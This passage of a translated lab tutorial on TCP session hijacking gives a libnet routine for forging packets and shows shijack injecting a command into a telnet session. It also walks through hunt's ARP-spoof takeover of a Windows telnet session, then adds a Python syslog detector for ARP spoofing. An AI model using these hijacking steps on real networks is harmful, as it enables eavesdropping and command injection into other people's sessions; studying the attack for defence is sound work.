  [root@chi chi]# gcc -o get_seq_ack get_seq_ack.c `libnet-config --defines` `libnet-config --libs` -lpcap -lnet
  [root@chi chi]# ./get_seq_ack
  get_seq_ack.c
  ./get_seq_ack <source_ip> <dest_ip>
  [root@chi chi]# ./get_seq_ack 192.168.25.1 192.168.25.4
  device = eth0
  Connection form 192.168.25.1 to 192.168.25.4
  wait for SEQ/ACK :
  Got packet! SEQ = 0x4eb9d6ca ACK = 0x83005cc
  source_port is 3486
  dest_port is 23
  [root@chi chi]#
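  The values found above are SEQ = 0x4eb9d6ca ACK = 0x83005cc. The next step is to use them to build the "fake" IP and TCP packets.

  ======================================================================================

  Next we first build the IP packet to be sent. Below is the IP protocol header; building an IP packet with libnet is very simple.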
  
  
  
  Ip protocol :
  
  
  
   0      4      8                16    19     24                     32
   ------------------------------------------------------------------------
   | VERS | HLEN |  Service Type  |            Total Length             |
   ------------------------------------------------------------------------
   |        Identification        | Flags |       Fragment Offset        |
   ------------------------------------------------------------------------
   |                          Source IP Address                          |
   ------------------------------------------------------------------------
   |                       Destination IP Address                        |
   ------------------------------------------------------------------------
   |                  IP Options                  |       Padding        |
   ------------------------------------------------------------------------
   |                                Data                                 |
   ------------------------------------------------------------------------

  I will not write an introduction to the IP packet here; it is too much trouble. Instead I will simply use libnet to build an IP packet and a TCP packet. If you do not follow, scz has written an introduction to libnet that explains clearly what you need to do.
  
   
  
  /******************************************************************************/

  /* Written by spwny */

  /* Build one IP + TCP packet with the given addresses, ports, flags, SEQ and ACK
     and write it to a raw socket. lrandom() is not defined in this excerpt. */
  void
  sendtcp(u_long srcip, u_long dstip, u_long sport, u_long dport, u_char flags, u_long seq, u_long ack, char *data, int datalen)
  {
      u_char *packet;
      int fd, psize;

      psize = LIBNET_IP_H + LIBNET_TCP_H + datalen;
      libnet_init_packet(psize, &packet);

      if (!packet)
          libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");
      /* open the raw socket once; a second open would leak a descriptor */
      if ((fd = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
          libnet_error(LIBNET_ERR_FATAL, "libnet_open_raw_sock failed\n");

      libnet_build_ip(LIBNET_TCP_H + datalen, 0, random(), 0, lrandom(128, 255), IPPROTO_TCP, srcip, dstip, NULL, 0, packet);
      libnet_build_tcp(sport, dport, seq, ack, flags, 65535, 0, (u_char *) data, datalen, packet + LIBNET_IP_H);

      if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H + datalen) == -1)
          libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
      libnet_write_ip(fd, packet, psize);
      libnet_close_raw_sock(fd);
      libnet_destroy_packet(&packet);
  }

  /********************************************************************************/
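  This is a small part of the code written by spwny, showing how the IP and TCP packets are built and sent. The full code can be found at the following site.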
  
  http://www.securiteam.com/tools/5QP0P0K40M.html
  
  So let me take his code and try it out.
  
   
  
  [chi@chi chi]$ gcc `libnet-config --defines` -o shijack shijack.c `libnet-config --libs` -lpcap -lnet
  [chi@chi chi]$ ./shijack
  Usage: ./shijack <interface> <src ip> <src port> <dst ip> <dst port> [-r]
  <interface> The interface you are going to hijack on.
  <src ip> The source ip of the connection.
  <src port> The source port of the connection.
  <dst ip> The destination IP of the connection.
  <dst port> The destination port of the connection.
  [-r] Reset the connection rather than hijacking it.
  
  Coded by spwny, Inspiration by cyclozine (http://www.geocities.com/stasikous).
  [chi@chi chi]$ ./shijack eth0 192.168.25.1 4345 192.168.25.4 23
  pcap_open_live: socket: Operation not permitted
  [chi@chi chi]$ su root
  Password:
  [root@chi chi]# ./shijack eth0 192.168.25.1 4345 192.168.25.4 23
  Waiting for SEQ/ACK to arrive from the srcip to the dstip.
  (To speed things up, try making some traffic between the two, /msg person asdf
  
  Got packet! SEQ = 0x2670dc37 ACK = 0x782c03bd
  Starting hijack session, Please use ^C to terminate.
  Anything you enter from now on is sent to the hijacked TCP connection.
  mkdir wokao
  Closing connection..
  Done, Exiting.
  
   
  
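  If you now look on 192.168.25.4, you will find a new directory named wokao. However, this program fails most of the time! Frustrating, but there is nothing to be done about it, so let's look at hunt instead. It works really well and has a high success rate! Read the hunt source yourselves when you have time; it made my head spin, it is hard going.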

IV. Installing and using hunt
  
   
  
  hunt is a program that can insert itself into someone else's communication; it can watch and reset that connection.
  
  ftp://rpmfind.net/linux/rhcontrib/7.1/i386/hunt-1.5-4.i386.rpm
  
  Requires:
  ld-linux.so.2
  libc.so.6
  libpthread.so.0
  /bin/sh
  
  Red Hat Linux release 7.3 (Valhalla)
  Kernel 2.4.18-3 on an i686
  login: chi
  Password:
  Last login: Sat Mar 22 11:46:22 from 192.168.25.1
  [chi@chi chi]$ su root
  Password:
  [root@chi chi]# rpm -ivh hunt-1.5-4.i386.rpm
  Preparing... ########################################### [100%]
  hunt ########################################### [100%]
  [root@chi chi]# /usr/sbin/hunt
  /*
  * hunt 1.5
  * multipurpose connection intruder / sniffer for Linux
  * (c) 1998-2000 by kra
  */
  starting hunt
  --- Main Menu --- rcvpkt 0, free/alloc 63/64 ------
  l/w/r) list/watch/reset connections
  u) host up tests -- host detection
  a) arp/simple hijack (avoids ack storm if arp used) -- connection hijack using ARP spoofing
  s) simple hijack -- simple connection hijack
  d) daemons rst/arp/sniff/mac
  o) options
  x) exit
  *>
  These are hunt's basic options. Before hunt can be used it has to detect a connection; only then can it insert itself.
...................
  *> a
  0) 192.168.25.4 [49152] --> 192.168.25.1 [23]
  1) 192.168.25.1 [3920] --> 192.168.25.3 [23]
  
  choose conn> 0
  arp spoof src in dst y/n [y]> y src is 192.168.25.1, dst is 192.168.25.4; that is, C's MAC is altered and sent to B
  src MAC [EA:1A:DE:AD:BE:01]> <========== the MAC can be chosen freely
  arp spoof dst in src y/n [y]> y B's MAC is altered and sent to C
  dst MAC [EA:1A:DE:AD:BE:02]>
  input mode [r]aw, [l]ine+echo+\r, line+[e]cho [r]>
  dump connectin y/n [y]> y
  dump [s]rc/[d]st/[b]oth [b]> b
  print src/dst same characters y/n [n]> n
  
   
  
  CTRL-C to break
  
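  At this point you have inserted yourself into the telnet connection but have not hijacked it, so the connection between B and C is unaffected; you simply see the session as it proceeds. When B sends the dir command to C: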
  
  ...........
  
   
  
  C:\>dir
  <C7><FD><B6><AF><C6><F7> C <D6><D0><B5><C4><BE><ED><C3><BB><D3><D0><B1><EA><C7> <BE><ED><B5><C4><D0><F2><C1><D0><BA><C5><CA><C7> 4446-19EA
  
  C:\ <B5><C4><C4><BF><C2><BC>
  
  2002-09-30 19:07 <DIR> WINDOWS
  2000-06-08 17:00 2,164 PDOS.DEF
  2002-09-30 19:07 <DIR> Program Files
  2002-09-30 19:33 <DIR> My Documents
  2002-09-30 20:34 <DIR> Downloads
  2003-03-02 23:14 16,660 PkgClnup.log
  2003-03-22 16:58 22,092 jswx.log
  2002-10-01 18:12 <DIR> My Music
  2002-10-09 20:46 <DIR> TURBOC2
  2002-11-11 10:35 468 SCANDISK.LOG
  2002-12-16 18:11 <DIR> TC30
  2003-03-21 12:19 0 AILog.txt
  2003-03-06 22:47 13,030 PDOXUSRS.NET
  2002-10-25 01:03 209 boot.ini
  7 <B8><F6><CE><C4><BC><FE> 54,623 <D7><D6><BD><DA>
  CTRL-C to break7 <B8><F6><C4><BF><C2><BC> 1,652,977,664 <BF><C9><D3><C3><D7><D6C:\>><DA>
  
   
  
  What is shown here is the same as what is seen on B, but we cannot yet send commands to C. Next, let's try taking over the connection.
CTRL-C to break
  
  -- press any key> you took over the connection
  ver
  
  Microsoft Windows 2000 [Version 5.00.2195]
  
  C:\>
  
   
  
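  At this point you have taken over the connection and can send your own commands. One shortcoming I noticed, though: in my test B was running FreeBSD 5.0, so once its connection had been hijacked, this message showed up on B!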
  
   
  
  $Mar 22 13:52:14 chi kernel : arp : 192.168.25.1 move form 00:01:02:e1:35:84 to ea:1a:de:ad:be:02
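
  The kernel message above is the defender's view of the takeover: the IP-to-MAC binding changed, and the new address is one of hunt's default spoofed MACs, which has the locally administered bit set. The following is an added example, not part of the original article, that scans syslog lines for such moves; the "moved from ... on fxp0" wording and every sample line except the first are constructed assumptions.

```python
import re
from collections import defaultdict

# Matches the message as typed on this page ("move form") and the assumed
# correctly spelled kernel wording ("moved from"); MACs are colon-separated hex.
MAC = r"(?:[0-9a-f]{2}:){5}[0-9a-f]{2}"
ARP_MOVE = re.compile(
    r"arp\s*:\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+moved?\s+(?:from|form)\s+"
    rf"(?P<old>{MAC})\s+to\s+(?P<new>{MAC})", re.IGNORECASE)

# Constructed sample log: only the first line is taken from the article.
SAMPLE = [
    "Mar 22 13:52:14 chi kernel : arp : 192.168.25.1 move form 00:01:02:e1:35:84 to ea:1a:de:ad:be:02",
    "Mar 22 13:52:20 chi sshd[411]: Accepted password for chi from 192.168.25.1",
    "Mar 22 13:55:02 chi kernel: arp: 192.168.25.1 moved from ea:1a:de:ad:be:02 to 00:01:02:e1:35:84 on fxp0",
    "Mar 22 14:10:40 chi kernel: arp: 192.168.25.9 moved from 00:0a:0b:0c:0d:0e to 00:0a:0b:0c:0d:1f on fxp0",
]

def is_locally_administered(mac):
    """True when the U/L bit (0x02 of the first octet) is set: not a vendor-assigned MAC."""
    return bool(int(mac.split(":")[0], 16) & 0x02)

def analyze(lines):
    """Return (ip, old_mac, new_mac, reasons) for each ARP move that looks like spoofing."""
    history = defaultdict(set)   # ip  -> every MAC it has been bound to
    owners = defaultdict(set)    # mac -> every IP that has used it
    findings = []
    for line in lines:
        m = ARP_MOVE.search(line)
        if not m:
            continue
        ip, old, new = m["ip"], m["old"].lower(), m["new"].lower()
        reasons = []
        if is_locally_administered(new):
            reasons.append("new MAC is locally administered")
        if new in history[ip]:
            reasons.append("binding flapped back to an earlier MAC")
        if owners[new] - {ip}:
            reasons.append("new MAC is already used by another IP")
        history[ip].update((old, new))
        owners[old].add(ip)
        owners[new].add(ip)
        if reasons:
            findings.append((ip, old, new, reasons))
    return findings

if __name__ == "__main__":
    for ip, old, new, reasons in analyze(SAMPLE):
        print(f"{ip}: {old} -> {new}: {'; '.join(reasons)}")
```

  A plain move between two vendor-assigned MACs, such as the last sample line, is deliberately not reported, since a replaced network card produces the same message.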
  
   
  
  V. References

  1. Simple Active Attack Against TCP (PDF format)

  2. Ed Norris, "Analysis of a Telnet Session Hijack via Spoofed MAC Addresses and Session Resynchronization"
  URL: http://ouah.sysdoor.net/hiresync.htm

  3. Kra (Krauz, Pavel), "hunt", 1998.
  URL: http://www.tml.hut.fi/Opinnot/Tik-110.400/2000/sniffer/hunt.txt

  4. Michal Zalewski, "Strange Attractors and TCP/IP Sequence Number Analysis"
  URL: http://ouah.sysdoor.net/strangeattract.htm

  5. Simple active attack against TCP
  URL: http://ouah.sysdoor.net/tcp_attack.pdf10

  Original author: Loose

